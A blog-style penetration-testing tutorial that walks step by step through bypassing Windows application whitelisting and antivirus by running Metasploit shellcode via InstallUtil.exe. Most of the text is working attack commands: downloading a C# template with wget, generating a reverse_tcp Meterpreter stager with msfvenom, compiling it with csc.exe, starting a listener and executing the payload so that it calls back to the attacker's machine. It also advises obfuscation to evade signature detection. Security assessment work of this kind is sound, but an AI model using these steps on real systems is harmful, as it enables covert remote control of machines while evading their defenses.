How to Bypass Application Whitelisting & AV

Brian Fehrman //

There are numerous methods that have been published to bypass Anti-Virus products. As a result, many companies are beginning to realize that application whitelisting is another tool to consider adding to their arsenal. Application whitelisting is advantageous in that it doesn’t require constant updating of behavioral or signature based detection algorithms; you explicitly tell it what can be run. Here, we will show you one method of bypassing some application whitelisting products.

Right up front, we will make it known that we did not develop this method. This method was developed by Casey Smith (@subTee). We stumbled upon it and felt that it was so awesome that we had to share it.

This method makes use of two neat features on Windows. The first feature is the ability to compile C# programs without needing the Visual Studio environment. The second feature, which is the one for bypassing application whitelisting, leverages a tool named InstallUtil.exe.

The first task will be to grab the InstallUtil-ShellCode.cs CSharp file. It might be easiest to download it to a Kali box for now. The file can be found at the following location:

We’ve also created a TinyURL to the raw file so that it can be grabbed via wget:

        wget http://tinyurl.com/InstallUtil-ShellCode-cs

        mv InstallUtil-ShellCode-cs InstallUtil-ShellCode.cs

After downloading the CSharp file, it’s time to generate our shell code. We will use msfvenom to output a reverse_tcp meterpreter stager. Type the following, replacing YOUR_IP with the IP address of your Kali machine.

        msfvenom -p windows/meterpreter/reverse_tcp lhost=YOUR_IP lport=443 -f csharp > shellcode.txt

Now, copy the contents of the shellcode.txt file to your clipboard

        cat shellcode.txt | xclip -selection clipboard

Open the InstallUtil-ShellCode.cs file for editing.

        gedit InstallUtil-ShellCode.cs &

Let’s take a minute to talk about the magic of this approach. In the InstallUtil-ShellCode.cs file, you will notice two functions towards the top. The function named Main (code in the green box) is what will be called if the program is executed normally (e.g., double-clicking, command line, sandboxing, etc.). The function named Uninstall (code in the orange box) will be executed when the program is run by using the InstallUtil.exe tool. The InstallUtil.exe tool is typically on the list of trusted applications and will likely bypass some application whitelisting software. The code within the Uninstall Function will make a call to the Shellcode function, which is where our malicious code will reside. The magic here is that it can potentially be used to bypass both behavioral based analysis and application whitelisting. With additional obfuscation, signature based analysis can also be averted.

Find the portion of code shown in the picture below and replace it with the shell code that is currently on your clipboard (the output from shellcode.txt). Change the word “buf” in the newly pasted shell code to be “shellcode”.

Next, let’s get this file over to our Windows machine. Save the InstallUtil-ShellCode.cs file and exit gedit. In the same terminal window, type the following to host the InstallUtil-ShellCode.cs file:

        python –m SimpleHTTPServer 80

On your Windows machine, open a web browser and type the IP address of your Kali machine. Download the InstallUtil-ShellCode.cs file from the directory listing.

Let’s go ahead and compile the file using the csc.exe tool. Open a command prompt, change to your Downloads directory, and compile the program by typing the following:

        

cd Downloads

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /unsafe /platform:x86 /out:exeshell.exe InstallUtil-ShellCode.cs

Hop back over to the Kali machine and let’s start a Meterpreter listener by using msfconsole. Kill the python server by hitting Ctrl-C in the terminal. Then, type the following (replacing YOUR_IP with your Kali IP address:

        msfconsole

        use multi/handler

        set payload windows/meterpreter/reverse_tcp

        set LHOST YOUR_IP

        set LPORT 443

        set ExitOnSession false

        run -j

Head back to the Window’s terminal. Type the following to execute the shell code program by using the InstallUtil.exe tool:

        C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe

Checking the Window’s task manager shows that just the InstallUtil.exe process is present and not our exeshell.exe file.

Pop back into the Kali machine and check out the msfconsole window. Did you get a session?

In closing, we’ve shown you one way to potentially bypass application whitelisting software. The method was developed by Casey Smith (@subTee). The demo here looked at establishing a meterpreter session but the possibilities are endless for what code you can execute on the system. Being able to compile the code on a Windows system without the need for Visual Studio is also a huge bonus. This method can also be used to avoid both behavioral and signature based anti-virus analysis. This is one approach that you will definitely want to keep in your tool box when it comes to assessing security tools.